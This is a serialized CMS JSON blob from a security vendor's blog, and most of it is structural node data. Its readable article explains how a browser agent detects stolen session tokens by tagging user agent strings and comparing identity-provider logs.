nodeType":173,"value":183955,"marks":211926,"data":211928},[211927],{"type":370},{},{"nodeType":173,"value":183960,"marks":211930,"data":211931},[],{},{"nodeType":254,"data":211933,"content":211934},{},[211935],{"nodeType":178,"data":211936,"content":211937},{},[211938,211942],{"nodeType":173,"value":183970,"marks":211939,"data":211941},[211940],{"type":370},{},{"nodeType":173,"value":183975,"marks":211943,"data":211944},[],{},{"nodeType":178,"data":211946,"content":211947},{},[211948,211951,211955],{"nodeType":173,"value":183982,"marks":211949,"data":211950},[],{},{"nodeType":173,"value":2718,"marks":211952,"data":211954},[211953],{"type":370},{},{"nodeType":173,"value":183990,"marks":211956,"data":211957},[],{},{"nodeType":312,"data":211959,"content":211962},{"target":211960},{"sys":211961},{"id":183997,"type":317,"linkType":318},[],{"nodeType":178,"data":211964,"content":211965},{},[211966],{"nodeType":173,"value":184003,"marks":211967,"data":211968},[],{},{"nodeType":169,"data":211970,"content":211971},{},[211972],{"nodeType":173,"value":184010,"marks":211973,"data":211974},[],{},{"nodeType":178,"data":211976,"content":211977},{},[211978],{"nodeType":173,"value":184017,"marks":211979,"data":211980},[],{},{"nodeType":178,"data":211982,"content":211983},{},[211984],{"nodeType":173,"value":184024,"marks":211985,"data":211986},[],{},{"nodeType":178,"data":211988,"content":211989},{},[211990,211993,211999],{"nodeType":173,"value":184031,"marks":211991,"data":211992},[],{},{"nodeType":186,"data":211994,"content":211995},{"uri":114007},[211996],{"nodeType":173,"value":184038,"marks":211997,"data":211998},[],{},{"nodeType":173,"value":184042,"marks":212000,"data":212001},[],{},{"nodeType":169,"data":212003,"content":212004},{},[212005],{"nodeType":173,"value":71801,"marks":212006,"data":212007},[],{},{"nodeType":178,"data":212009,"content":212010},{},[212011,212014,212020],{"nodeType":173,"value":184055,"marks":212012,"data":212013},[],{},{"nodeType":186,"data":212015,"content":212016},{"uri":114457},[212017],{"nodeType":173,"value":88194,"marks":212018,"data":212019},[],{},{"nodeType":173,"value":184065,"marks":212021,"data":212022},[],{},{"items":212024},[212025,212027],{"sys":212026,"name":18399},{"id":18398},{"sys":212028,"name":509},{"id":508},{"items":212030},[212031],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":212032},{"url":2911},{"__typename":1528,"sys":212034,"content":212035,"title":212529,"synopsis":212530,"hashTags":118,"publishedDate":114485,"slug":212531,"tagsCollection":212532,"authorsCollection":212538},{"id":114220},{"json":212036},{"nodeType":165,"data":212037,"content":212038},{},[212039,212045,212052,212085,212092,212111,212118,212163,212170,212177,212184,212189,212196,212283,212290,212297,212320,212327,212334,212341,212348,212355,212361,212410,212417,212422,212439,212445,212452,212472,212479,212486,212493,212500,212507,212513],{"nodeType":312,"data":212040,"content":212044},{"target":212041},{"sys":212042},{"id":212043,"type":317,"linkType":318},"2HffP4X7owzpfj41jnzXmV",[],{"nodeType":178,"data":212046,"content":212047},{},[212048],{"nodeType":173,"value":212049,"marks":212050,"data":212051},"To detect session token theft, you need three things:",[],{},{"nodeType":250,"data":212053,"content":212054},{},[212055,212065,212075],{"nodeType":254,"data":212056,"content":212057},{},[212058],{"nodeType":178,"data":212059,"content":212060},{},[212061],{"nodeType":173,"value":212062,"marks":212063,"data":212064},"Robust logs that provide an identifier to help tie activity to a specific session",[],{},{"nodeType":254,"data":212066,"content":212067},{},[212068],{"nodeType":178,"data":212069,"content":212070},{},[212071],{"nodeType":173,"value":212072,"marks":212073,"data":212074},"A well-oiled SOC to correlate observed activity in those logs",[],{},{"nodeType":254,"data":212076,"content":212077},{},[212078],{"nodeType":178,"data":212079,"content":212080},{},[212081],{"nodeType":173,"value":212082,"marks":212083,"data":212084},"And telemetry to tie those logs to a trusted endpoint",[],{},{"nodeType":178,"data":212086,"content":212087},{},[212088],{"nodeType":173,"value":212089,"marks":212090,"data":212091},"The only problem? That third thing didn’t really exist. So we created it.",[],{},{"nodeType":178,"data":212093,"content":212094},{},[212095,212099,212107],{"nodeType":173,"value":212096,"marks":212097,"data":212098},"In this article, we’ll cover how Push’s recently released ",[],{},{"nodeType":186,"data":212100,"content":212102},{"uri":212101},"https://pushsecurity.com/help/10114#start",[212103],{"nodeType":173,"value":126168,"marks":212104,"data":212106},[212105],{"type":194},{},{"nodeType":173,"value":212108,"marks":212109,"data":212110}," feature works, why we built it, and why the unique control point provided by a browser agent unlocks new capabilities for blue teams fighting the effects of infostealer malware and other stolen credential-based attacks.",[],{},{"nodeType":169,"data":212112,"content":212113},{},[212114],{"nodeType":173,"value":212115,"marks":212116,"data":212117},"(You probably already know) Why this matters",[],{},{"nodeType":178,"data":212119,"content":212120},{},[212121,212125,212134,212138,212147,212151,212159],{"nodeType":173,"value":212122,"marks":212123,"data":212124},"Session token theft is a ",[],{},{"nodeType":186,"data":212126,"content":212128},{"uri":212127},"https://owasp.org/www-community/attacks/Session_hijacking_attack",[212129],{"nodeType":173,"value":212130,"marks":212131,"data":212133},"session hijacking",[212132],{"type":194},{},{"nodeType":173,"value":212135,"marks":212136,"data":212137}," technique where endpoint malware is used to extract sessions from an endpoint, and until recently it was ",[],{},{"nodeType":186,"data":212139,"content":212141},{"uri":212140},"https://www.microsoft.com/en-us/security/blog/2022/11/16/token-tactics-how-to-prevent-detect-and-respond-to-cloud-token-theft/",[212142],{"nodeType":173,"value":212143,"marks":212144,"data":212146},"relatively rare",[212145],{"type":194},{},{"nodeType":173,"value":212148,"marks":212149,"data":212150},". It’s easier to ",[],{},{"nodeType":186,"data":212152,"content":212153},{"uri":182804},[212154],{"nodeType":173,"value":212155,"marks":212156,"data":212158},"gain access via a password",[212157],{"type":194},{},{"nodeType":173,"value":212160,"marks":212161,"data":212162}," than it is to steal a session cookie. ",[],{},{"nodeType":178,"data":212164,"content":212165},{},[212166],{"nodeType":173,"value":212167,"marks":212168,"data":212169},"But there’s an inverse relationship between session-based attacks and MFA adoption. As MFA becomes widespread, adversaries turn to new effective methods of initial entry.",[],{},{"nodeType":178,"data":212171,"content":212172},{},[212173],{"nodeType":173,"value":212174,"marks":212175,"data":212176},"An increasingly common approach involves the use of infostealer malware, which can extract saved credentials, browser cookies, cryptowallets, and other valuable data from the infected endpoint.",[],{},{"nodeType":178,"data":212178,"content":212179},{},[212180],{"nodeType":173,"value":212181,"marks":212182,"data":212183},"Using stolen tokens, adversaries don’t need to bypass MFA directly. They can simply import the tokens into their browser and assume an already authorized session.",[],{},{"nodeType":312,"data":212185,"content":212188},{"target":212186},{"sys":212187},{"id":196342,"type":317,"linkType":318},[],{"nodeType":178,"data":212190,"content":212191},{},[212192],{"nodeType":173,"value":212193,"marks":212194,"data":212195},"A few recent stats show the scope of the problem:",[],{},{"nodeType":250,"data":212197,"content":212198},{},[212199,212220,212242,212263],{"nodeType":254,"data":212200,"content":212201},{},[212202],{"nodeType":178,"data":212203,"content":212204},{},[212205,212209,212217],{"nodeType":173,"value":212206,"marks":212207,"data":212208},"Nearly half of the malware detected last year by Sophos targeted victims’ data specifically, and the majority of that malware was classified as infostealers. Source: ",[],{},{"nodeType":186,"data":212210,"content":212211},{"uri":150408},[212212],{"nodeType":173,"value":212213,"marks":212214,"data":212216},"2024 Sophos Threat Report",[212215],{"type":194},{},{"nodeType":173,"value":37,"marks":212218,"data":212219},[],{},{"nodeType":254,"data":212221,"content":212222},{},[212223],{"nodeType":178,"data":212224,"content":212225},{},[212226,212230,212239],{"nodeType":173,"value":212227,"marks":212228,"data":212229},"Information-stealing malware accounted for nearly 10 percent of activity that Red Canary was able to associate with named threats last year. They also found a rise in stealer malware targeting macOS compared to previous years. Source: ",[],{},{"nodeType":186,"data":212231,"content":212233},{"uri":212232},"https://redcanary.com/threat-detection-report/trends/info-stealers/",[212234],{"nodeType":173,"value":212235,"marks":212236,"data":212238},"2024 Red Canary Threat Detection Report",[212237],{"type":194},{},{"nodeType":173,"value":37,"marks":212240,"data":212241},[],{},{"nodeType":254,"data":212243,"content":212244},{},[212245],{"nodeType":178,"data":212246,"content":212247},{},[212248,212252,212260],{"nodeType":173,"value":212249,"marks":212250,"data":212251},"Stolen credentials continued to rank as the top initial access method for breaches analyzed by Verizon. Source: ",[],{},{"nodeType":186,"data":212253,"content":212254},{"uri":1297},[212255],{"nodeType":173,"value":212256,"marks":212257,"data":212259},"2024 Data Breach Investigations Report",[212258],{"type":194},{},{"nodeType":173,"value":37,"marks":212261,"data":212262},[],{},{"nodeType":254,"data":212264,"content":212265},{},[212266],{"nodeType":178,"data":212267,"content":212268},{},[212269,212273,212280],{"nodeType":173,"value":212270,"marks":212271,"data":212272},"The number of token replay attacks is increasing, with Microsoft detecting 147,000 attacks in 2023, a 111% increase year-over-year. Source: ",[],{},{"nodeType":186,"data":212274,"content":212275},{"uri":174431},[212276],{"nodeType":173,"value":212277,"marks":212278,"data":212279},"Microsoft Blog",[],{},{"nodeType":173,"value":37,"marks":212281,"data":212282},[],{},{"nodeType":169,"data":212284,"content":212285},{},[212286],{"nodeType":173,"value":212287,"marks":212288,"data":212289},"What's missing from current defenses",[],{},{"nodeType":178,"data":212291,"content":212292},{},[212293],{"nodeType":173,"value":212294,"marks":212295,"data":212296},"When defending against infostealer malware or other forms of session and credential theft, there are a few common challenges that organizations may face:",[],{},{"nodeType":250,"data":212298,"content":212299},{},[212300,212310],{"nodeType":254,"data":212301,"content":212302},{},[212303],{"nodeType":178,"data":212304,"content":212305},{},[212306],{"nodeType":173,"value":212307,"marks":212308,"data":212309},"Their endpoint security tooling doesn’t provide complete coverage across their device fleet, though they thought it did.",[],{},{"nodeType":254,"data":212311,"content":212312},{},[212313],{"nodeType":178,"data":212314,"content":212315},{},[212316],{"nodeType":173,"value":212317,"marks":212318,"data":212319},"The malware is good enough to evade EDR detection, or it was able to execute and exfiltrate sessions or other data before it was stopped.",[],{},{"nodeType":178,"data":212321,"content":212322},{},[212323],{"nodeType":173,"value":212324,"marks":212325,"data":212326},"Existing approaches to detecting stolen sessions also pose a noisy problem. Relying on IP-based or geolocation-based signals can result in frequent false positives. (And not all identity provider logs include a session identifier that you can use to perform correlations in the first place.)",[],{},{"nodeType":178,"data":212328,"content":212329},{},[212330],{"nodeType":173,"value":212331,"marks":212332,"data":212333},"The missing piece is a trusted signal for legitimate sessions that you can use to correlate with other data in order to identify unexpected activity that indicates a compromised identity and device.",[],{},{"nodeType":169,"data":212335,"content":212336},{},[212337],{"nodeType":173,"value":212338,"marks":212339,"data":212340},"Generating unique telemetry via the browser",[],{},{"nodeType":178,"data":212342,"content":212343},{},[212344],{"nodeType":173,"value":212345,"marks":212346,"data":212347},"Push’s solution to detecting stolen sessions falls into the category of “so simple, why didn’t this already exist?”",[],{},{"nodeType":178,"data":212349,"content":212350},{},[212351],{"nodeType":173,"value":212352,"marks":212353,"data":212354},"The answer: Because you need to be in the browser to do it. The Push browser agent sits in a unique position that we can leverage to provide telemetry that otherwise would be extremely difficult to create.",[],{},{"nodeType":178,"data":212356,"content":212357},{},[212358],{"nodeType":173,"value":100610,"marks":212359,"data":212360},[],{},{"nodeType":250,"data":212362,"content":212363},{},[212364,212374,212384],{"nodeType":254,"data":212365,"content":212366},{},[212367],{"nodeType":178,"data":212368,"content":212369},{},[212370],{"nodeType":173,"value":212371,"marks":212372,"data":212373},"Via the Push browser agent, Push injects a unique marker into the user agent string of sessions that occur in browsers enrolled in Push.",[],{},{"nodeType":254,"data":212375,"content":212376},{},[212377],{"nodeType":178,"data":212378,"content":212379},{},[212380],{"nodeType":173,"value":212381,"marks":212382,"data":212383},"Administrators then add the list of domains where they wish to inject the marker into sessions, such as an identity provider like Okta or Microsoft.",[],{},{"nodeType":254,"data":212385,"content":212386},{},[212387],{"nodeType":178,"data":212388,"content":212389},{},[212390,212394,212398,212402,212406],{"nodeType":173,"value":212391,"marks":212392,"data":212393},"By analyzing logs from the IdP, you can identify activity from the same session that both ",[],{},{"nodeType":173,"value":208,"marks":212395,"data":212397},[212396],{"type":1646},{},{"nodeType":173,"value":212399,"marks":212400,"data":212401}," the Push marker and that ",[],{},{"nodeType":173,"value":114302,"marks":212403,"data":212405},[212404],{"type":1646},{},{"nodeType":173,"value":212407,"marks":212408,"data":212409}," the marker. This can only ever happen when a session is extracted from a browser and maliciously imported into a different browser.",[],{},{"nodeType":178,"data":212411,"content":212412},{},[212413],{"nodeType":173,"value":212414,"marks":212415,"data":212416},"This is a high-fidelity signal that a stolen session token is in use.",[],{},{"nodeType":312,"data":212418,"content":212421},{"target":212419},{"sys":212420},{"id":114271,"type":317,"linkType":318},[],{"nodeType":178,"data":212423,"content":212424},{},[212425,212429,212436],{"nodeType":173,"value":212426,"marks":212427,"data":212428},"Learn more about configuring this feature in our ",[],{},{"nodeType":186,"data":212430,"content":212431},{"uri":212101},[212432],{"nodeType":173,"value":3262,"marks":212433,"data":212435},[212434],{"type":194},{},{"nodeType":173,"value":1477,"marks":212437,"data":212438},[],{},{"nodeType":312,"data":212440,"content":212444},{"target":212441},{"sys":212442},{"id":212443,"type":317,"linkType":318},"35dpGqNY6cTM0fSQRflLiO",[],{"nodeType":169,"data":212446,"content":212447},{},[212448],{"nodeType":173,"value":212449,"marks":212450,"data":212451},"Unlocking new capabilities for blue teams",[],{},{"nodeType":178,"data":212453,"content":212454},{},[212455,212459,212468],{"nodeType":173,"value":212456,"marks":212457,"data":212458},"As we’ve said before, we see browser telemetry and browser-based controls as the ",[],{},{"nodeType":186,"data":212460,"content":212462},{"uri":212461},"https://pushsecurity.com/blog/what-is-itdr-identity-threat-detection-response/",[212463],{"nodeType":173,"value":212464,"marks":212465,"data":212467},"missing piece",[212466],{"type":194},{},{"nodeType":173,"value":212469,"marks":212470,"data":212471}," in security strategies to stop identity attacks — particularly for modern organizations with complex identity ecosystems that span IdPs, SaaS apps, OAuth-connected apps, and more.",[],{},{"nodeType":178,"data":212473,"content":212474},{},[212475],{"nodeType":173,"value":212476,"marks":212477,"data":212478},"Where the browser agent approach particularly shines is that it’s application-agnostic. ",[],{},{"nodeType":178,"data":212480,"content":212481},{},[212482],{"nodeType":173,"value":212483,"marks":212484,"data":212485},"As long as the app you want to monitor provides robust logs, you can inject the Push-supplied marker into any session on any app. ",[],{},{"nodeType":178,"data":212487,"content":212488},{},[212489],{"nodeType":173,"value":212490,"marks":212491,"data":212492},"This allows you to detect suspicious activity even on internal corporate assets, such as an intranet. ",[],{},{"nodeType":178,"data":212494,"content":212495},{},[212496],{"nodeType":173,"value":212497,"marks":212498,"data":212499},"A tidy side effect is that you can also use this feature to identify unmanaged devices accessing sensitive corporate internal resources because they will lack the Push browser agent-supplied marker.",[],{},{"nodeType":178,"data":212501,"content":212502},{},[212503],{"nodeType":173,"value":212504,"marks":212505,"data":212506},"There are probably a few other creative use cases for this feature, so we look forward to seeing what you come up with!",[],{},{"nodeType":169,"data":212508,"content":212509},{},[212510],{"nodeType":173,"value":71801,"marks":212511,"data":212512},[],{},{"nodeType":178,"data":212514,"content":212515},{},[212516,212519,212526],{"nodeType":173,"value":114452,"marks":212517,"data":212518},[],{},{"nodeType":186,"data":212520,"content":212521},{"uri":473},[212522],{"nodeType":173,"value":88194,"marks":212523,"data":212525},[212524],{"type":194},{},{"nodeType":173,"value":202527,"marks":212527,"data":212528},[],{},"Introducing session token theft detection: Why browser is best","Push's browser agent identifies session token theft by adding telemetry to the user agent string to create a new high-fidelity signal for your security team.","introducing-session-token-theft-detection-why-browser-is-best",{"items":212533},[212534,212536],{"sys":212535,"name":509},{"id":508},{"sys":212537,"name":18399},{"id":18398},{"items":212539},[212540],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":212541},{"url":2911},{"__typename":1528,"sys":212543,"content":212544,"title":202530,"synopsis":202531,"hashTags":118,"publishedDate":202532,"slug":202533,"tagsCollection":212896,"authorsCollection":212902},{"id":114387},{"json":212545},{"nodeType":165,"data":212546,"content":212547},{},[212548,212553,212570,212587,212602,212619,212640,212646,212663,212680,212686,212691,212697,212703,212709,212715,212721,212727,212733,212739,212745,212762,212768,212773,212793,212799,212814,212819,212836,212842,212848,212854,212860,212875,212881],{"nodeType":312,"data":212549,"content":212552},{"target":212550},{"sys":212551},{"id":202136,"type":317,"linkType":318},[],{"nodeType":178,"data":212554,"content":212555},{},[212556,212559,212567],{"nodeType":173,"value":202142,"marks":212557,"data":212558},[],{},{"nodeType":1698,"data":212560,"content":212563},{"target":212561},{"sys":212562},{"id":202149,"type":317,"linkType":318},[212564],{"nodeType":173,"value":202152,"marks":212565,"data":212566},[],{},{"nodeType":173,"value":202156,"marks":212568,"data":212569},[],{},{"nodeType":178,"data":212571,"content":212572},{},[212573,212576,212584],{"nodeType":173,"value":202163,"marks":212574,"data":212575},[],{},{"nodeType":1698,"data":212577,"content":212580},{"target":212578},{"sys":212579},{"id":202170,"type":317,"linkType":318},[212581],{"nodeType":173,"value":202173,"marks":212582,"data":212583},[],{},{"nodeType":173,"value":202177,"marks":212585,"data":212586},[],{},{"nodeType":178,"data":212588,"content":212589},{},[212590,212593,212599],{"nodeType":173,"value":202184,"marks":212591,"data":212592},[],{},{"nodeType":186,"data":212594,"content":212595},{"uri":183364},[212596],{"nodeType":173,"value":202191,"marks":212597,"data":212598},[],{},{"nodeType":173,"value":202195,"marks":212600,"data":212601},[],{},{"nodeType":178,"data":212603,"content":212604},{},[212605,212608,212616],{"nodeType":173,"value":202202,"marks":212606,"data":212607},[],{},{"nodeType":1698,"data":212609,"content":212612},{"target":212610},{"sys":212611},{"id":202149,"type":317,"linkType":318},[212613],{"nodeType":173,"value":202211,"marks":212614,"data":212615},[],{},{"nodeType":173,"value":202215,"marks":212617,"data":212618},[],{},{"nodeType":250,"data":212620,"content":212621},{},[212622,212631],{"nodeType":254,"data":212623,"content":212624},{},[212625],{"nodeType":178,"data":212626,"content":212627},{},[212628],{"nodeType":173,"value":202228,"marks":212629,"data":212630},[],{},{"nodeType":254,"data":212632,"content":212633},{},[212634],{"nodeType":178,"data":212635,"content":212636},{},[212637],{"nodeType":173,"value":202238,"marks":212638,"data":212639},[],{},{"nodeType":178,"data":212641,"content":212642},{},[212643],{"nodeType":173,"value":202245,"marks":212644,"data":212645},[],{},{"nodeType":178,"data":212647,"content":212648},{},[212649,212652,212660],{"nodeType":173,"value":202252,"marks":212650,"data":212651},[],{},{"nodeType":1698,"data":212653,"content":212656},{"target":212654},{"sys":212655},{"id":2148,"type":317,"linkType":318},[212657],{"nodeType":173,"value":202261,"marks":212658,"data":212659},[],{},{"nodeType":173,"value":202265,"marks":212661,"data":212662},[],{},{"nodeType":178,"data":212664,"content":212665},{},[212666,212669,212677],{"nodeType":173,"value":202272,"marks":212667,"data":212668},[],{},{"nodeType":1698,"data":212670,"content":212673},{"target":212671},{"sys":212672},{"id":189461,"type":317,"linkType":318},[212674],{"nodeType":173,"value":202281,"marks":212675,"data":212676},[],{},{"nodeType":173,"value":202285,"marks":212678,"data":212679},[],{},{"nodeType":178,"data":212681,"content":212682},{},[212683],{"nodeType":173,"value":202292,"marks":212684,"data":212685},[],{},{"nodeType":312,"data":212687,"content":212690},{"target":212688},{"sys":212689},{"id":202299,"type":317,"linkType":318},[],{"nodeType":169,"data":212692,"content":212693},{},[212694],{"nodeType":173,"value":202305,"marks":212695,"data":212696},[],{},{"nodeType":178,"data":212698,"content":212699},{},[212700],{"nodeType":173,"value":202312,"marks":212701,"data":212702},[],{},{"nodeType":178,"data":212704,"content":212705},{},[212706],{"nodeType":173,"value":202319,"marks":212707,"data":212708},[],{},{"nodeType":178,"data":212710,"content":212711},{},[212712],{"nodeType":173,"value":202326,"marks":212713,"data":212714},[],{},{"nodeType":178,"data":212716,"content":212717},{},[212718],{"nodeType":173,"value":202333,"marks":212719,"data":212720},[],{},{"nodeType":178,"data":212722,"content":212723},{},[212724],{"nodeType":173,"value":202340,"marks":212725,"data":212726},[],{},{"nodeType":178,"data":212728,"content":212729},{},[212730],{"nodeType":173,"value":202347,"marks":212731,"data":212732},[],{},{"nodeType":169,"data":212734,"content":212735},{},[212736],{"nodeType":173,"value":189115,"marks":212737,"data":212738},[],{},{"nodeType":178,"data":212740,"content":212741},{},[212742],{"nodeType":173,"value":202360,"marks":212743,"data":212744},[],{},{"nodeType":178,"data":212746,"content":212747},{},[212748,212751,212759],{"nodeType":173,"value":202367,"marks":212749,"data":212750},[],{},{"nodeType":1698,"data":212752,"content":212755},{"target":212753},{"sys":212754},{"id":183439,"type":317,"linkType":318},[212756],{"nodeType":173,"value":155418,"marks":212757,"data":212758},[],{},{"nodeType":173,"value":202379,"marks":212760,"data":212761},[],{},{"nodeType":178,"data":212763,"content":212764},{},[212765],{"nodeType":173,"value":202386,"marks":212766,"data":212767},[],{},{"nodeType":312,"data":212769,"content":212772},{"target":212770},{"sys":212771},{"id":189099,"type":317,"linkType":318},[],{"nodeType":178,"data":212774,"content":212775},{},[212776,212779,212783,212786,212790],{"nodeType":173,"value":180786,"marks":212777,"data":212778},[],{},{"nodeType":173,"value":2748,"marks":212780,"data":212782},[212781],{"type":370},{},{"nodeType":173,"value":202405,"marks":212784,"data":212785},[],{},{"nodeType":173,"value":2740,"marks":212787,"data":212789},[212788],{"type":370},{},{"nodeType":173,"value":202413,"marks":212791,"data":212792},[],{},{"nodeType":178,"data":212794,"content":212795},{},[212796],{"nodeType":173,"value":202420,"marks":212797,"data":212798},[],{},{"nodeType":178,"data":212800,"content":212801},{},[212802,212805,212811],{"nodeType":173,"value":196274,"marks":212803,"data":212804},[],{},{"nodeType":186,"data":212806,"content":212807},{"uri":183466},[212808],{"nodeType":173,"value":155030,"marks":212809,"data":212810},[],{},{"nodeType":173,"value":196284,"marks":212812,"data":212813},[],{},{"nodeType":312,"data":212815,"content":212818},{"target":212816},{"sys":212817},{"id":202442,"type":317,"linkType":318},[],{"nodeType":178,"data":212820,"content":212821},{},[212822,212825,212833],{"nodeType":173,"value":202448,"marks":212823,"data":212824},[],{},{"nodeType":1698,"data":212826,"content":212829},{"target":212827},{"sys":212828},{"id":2405,"type":317,"linkType":318},[212830],{"nodeType":173,"value":125683,"marks":212831,"data":212832},[],{},{"nodeType":173,"value":202460,"marks":212834,"data":212835},[],{},{"nodeType":178,"data":212837,"content":212838},{},[212839],{"nodeType":173,"value":202467,"marks":212840,"data":212841},[],{},{"nodeType":178,"data":212843,"content":212844},{},[212845],{"nodeType":173,"value":202474,"marks":212846,"data":212847},[],{},{"nodeType":169,"data":212849,"content":212850},{},[212851],{"nodeType":173,"value":117844,"marks":212852,"data":212853},[],{},{"nodeType":178,"data":212855,"content":212856},{},[212857],{"nodeType":173,"value":202487,"marks":212858,"data":212859},[],{},{"nodeType":178,"data":212861,"content":212862},{},[212863,212866,212872],{"nodeType":173,"value":202494,"marks":212864,"data":212865},[],{},{"nodeType":186,"data":212867,"content":212868},{"uri":202499},[212869],{"nodeType":173,"value":202502,"marks":212870,"data":212871},[],{},{"nodeType":173,"value":1477,"marks":212873,"data":212874},[],{},{"nodeType":169,"data":212876,"content":212877},{},[212878],{"nodeType":173,"value":71801,"marks":212879,"data":212880},[],{},{"nodeType":178,"data":212882,"content":212883},{},[212884,212887,212893],{"nodeType":173,"value":114452,"marks":212885,"data":212886},[],{},{"nodeType":186,"data":212888,"content":212889},{"uri":473},[212890],{"nodeType":173,"value":88194,"marks":212891,"data":212892},[],{},{"nodeType":173,"value":202527,"marks":212894,"data":212895},[],{},{"items":212897},[212898,212900],{"sys":212899,"name":18399},{"id":18398},{"sys":212901,"name":509},{"id":508},{"items":212903},[212904],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":212905},{"url":2911},{"url":212907},"https://images.ctfassets.net/y1cdw1ablpvd/30YWVepOBUQeSVGynF251a/3821d6b78bf8cc2edac6770f587e1ed8/Frame_627569__10_.png",{"items":212909},[212910],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":212911},{"url":1496},{"json":212913,"links":213467},{"nodeType":165,"data":212914,"content":212915},{},[212916,212922,212928,212948,212953,212959,212965,212968,212974,212990,212995,213001,213034,213040,213046,213052,213058,213064,213070,213085,213092,213095,213101,213107,213113,213119,213125,213131,213137,213179,213185,213191,213197,213213,213219,213225,213231,213237,213243,213249,213255,213270,213285,213324,213330,213336,213393,213399,213402,213408,213421,213436,213442,213447,213452,213455,213461],{"nodeType":178,"data":212917,"content":212918},{},[212919],{"nodeType":173,"value":74502,"marks":212920,"data":212921},[],{},{"nodeType":178,"data":212923,"content":212924},{},[212925],{"nodeType":173,"value":74509,"marks":212926,"data":212927},[],{},{"nodeType":178,"data":212929,"content":212930},{},[212931,212934,212941,212944],{"nodeType":173,"value":74516,"marks":212932,"data":212933},[],{},{"nodeType":186,"data":212935,"content":212936},{"uri":74521},[212937],{"nodeType":173,"value":74524,"marks":212938,"data":212940},[212939],{"type":194},{},{"nodeType":173,"value":74529,"marks":212942,"data":212943},[],{},{"nodeType":173,"value":74533,"marks":212945,"data":212947},[212946],{"type":370},{},{"nodeType":312,"data":212949,"content":212952},{"target":212950},{"sys":212951},{"id":74541,"type":317,"linkType":318},[],{"nodeType":178,"data":212954,"content":212955},{},[212956],{"nodeType":173,"value":74547,"marks":212957,"data":212958},[],{},{"nodeType":178,"data":212960,"content":212961},{},[212962],{"nodeType":173,"value":74554,"marks":212963,"data":212964},[],{},{"nodeType":231,"data":212966,"content":212967},{},[],{"nodeType":169,"data":212969,"content":212970},{},[212971],{"nodeType":173,"value":74564,"marks":212972,"data":212973},[],{},{"nodeType":178,"data":212975,"content":212976},{},[212977,212980,212987],{"nodeType":173,"value":74571,"marks":212978,"data":212979},[],{},{"nodeType":186,"data":212981,"content":212982},{"uri":74576},[212983],{"nodeType":173,"value":74579,"marks":212984,"data":212986},[212985],{"type":194},{},{"nodeType":173,"value":74584,"marks":212988,"data":212989},[],{},{"nodeType":312,"data":212991,"content":212994},{"target":212992},{"sys":212993},{"id":74591,"type":317,"linkType":318},[],{"nodeType":178,"data":212996,"content":212997},{},[212998],{"nodeType":173,"value":74597,"marks":212999,"data":213000},[],{},{"nodeType":178,"data":213002,"content":213003},{},[213004,213007,213013,213016,213022,213025,213031],{"nodeType":173,"value":74604,"marks":213005,"data":213006},[],{},{"nodeType":186,"data":213008,"content":213009},{"uri":74609},[213010],{"nodeType":173,"value":74612,"marks":213011,"data":213012},[],{},{"nodeType":173,"value":74616,"marks":213014,"data":213015},[],{},{"nodeType":186,"data":213017,"content":213018},{"uri":74621},[213019],{"nodeType":173,"value":74624,"marks":213020,"data":213021},[],{},{"nodeType":173,"value":74628,"marks":213023,"data":213024},[],{},{"nodeType":186,"data":213026,"content":213027},{"uri":3999},[213028],{"nodeType":173,"value":74635,"marks":213029,"data":213030},[],{},{"nodeType":173,"value":74639,"marks":213032,"data":213033},[],{},{"nodeType":178,"data":213035,"content":213036},{},[213037],{"nodeType":173,"value":74646,"marks":213038,"data":213039},[],{},{"nodeType":235,"data":213041,"content":213042},{},[213043],{"nodeType":173,"value":74653,"marks":213044,"data":213045},[],{},{"nodeType":178,"data":213047,"content":213048},{},[213049],{"nodeType":173,"value":74660,"marks":213050,"data":213051},[],{},{"nodeType":178,"data":213053,"content":213054},{},[213055],{"nodeType":173,"value":74667,"marks":213056,"data":213057},[],{},{"nodeType":178,"data":213059,"content":213060},{},[213061],{"nodeType":173,"value":74674,"marks":213062,"data":213063},[],{},{"nodeType":178,"data":213065,"content":213066},{},[213067],{"nodeType":173,"value":74681,"marks":213068,"data":213069},[],{},{"nodeType":178,"data":213071,"content":213072},{},[213073,213076,213082],{"nodeType":173,"value":74688,"marks":213074,"data":213075},[],{},{"nodeType":186,"data":213077,"content":213078},{"uri":74693},[213079],{"nodeType":173,"value":74696,"marks":213080,"data":213081},[],{},{"nodeType":173,"value":74700,"marks":213083,"data":213084},[],{},{"nodeType":178,"data":213086,"content":213087},{},[213088],{"nodeType":173,"value":74707,"marks":213089,"data":213091},[213090],{"type":370},{},{"nodeType":231,"data":213093,"content":213094},{},[],{"nodeType":169,"data":213096,"content":213097},{},[213098],{"nodeType":173,"value":74718,"marks":213099,"data":213100},[],{},{"nodeType":178,"data":213102,"content":213103},{},[213104],{"nodeType":173,"value":74725,"marks":213105,"data":213106},[],{},{"nodeType":178,"data":213108,"content":213109},{},[213110],{"nodeType":173,"value":74732,"marks":213111,"data":213112},[],{},{"nodeType":178,"data":213114,"content":213115},{},[213116],{"nodeType":173,"value":74739,"marks":213117,"data":213118},[],{},{"nodeType":178,"data":213120,"content":213121},{},[213122],{"nodeType":173,"value":74746,"marks":213123,"data":213124},[],{},{"nodeType":235,"data":213126,"content":213127},{},[213128],{"nodeType":173,"value":74753,"marks":213129,"data":213130},[],{},{"nodeType":178,"data":213132,"content":213133},{},[213134],{"nodeType":173,"value":74760,"marks":213135,"data":213136},[],{},{"nodeType":250,"data":213138,"content":213139},{},[213140,213153,213166],{"nodeType":254,"data":213141,"content":213142},{},[213143],{"nodeType":178,"data":213144,"content":213145},{},[213146,213150],{"nodeType":173,"value":74773,"marks":213147,"data":213149},[213148],{"type":370},{},{"nodeType":173,"value":74778,"marks":213151,"data":213152},[],{},{"nodeType":254,"data":213154,"content":213155},{},[213156],{"nodeType":178,"data":213157,"content":213158},{},[213159,213163],{"nodeType":173,"value":74788,"marks":213160,"data":213162},[213161],{"type":370},{},{"nodeType":173,"value":74793,"marks":213164,"data":213165},[],{},{"nodeType":254,"data":213167,"content":213168},{},[213169],{"nodeType":178,"data":213170,"content":213171},{},[213172,213176],{"nodeType":173,"value":74803,"marks":213173,"data":213175},[213174],{"type":370},{},{"nodeType":173,"value":74808,"marks":213177,"data":213178},[],{},{"nodeType":178,"data":213180,"content":213181},{},[213182],{"nodeType":173,"value":74815,"marks":213183,"data":213184},[],{},{"nodeType":235,"data":213186,"content":213187},{},[213188],{"nodeType":173,"value":74822,"marks":213189,"data":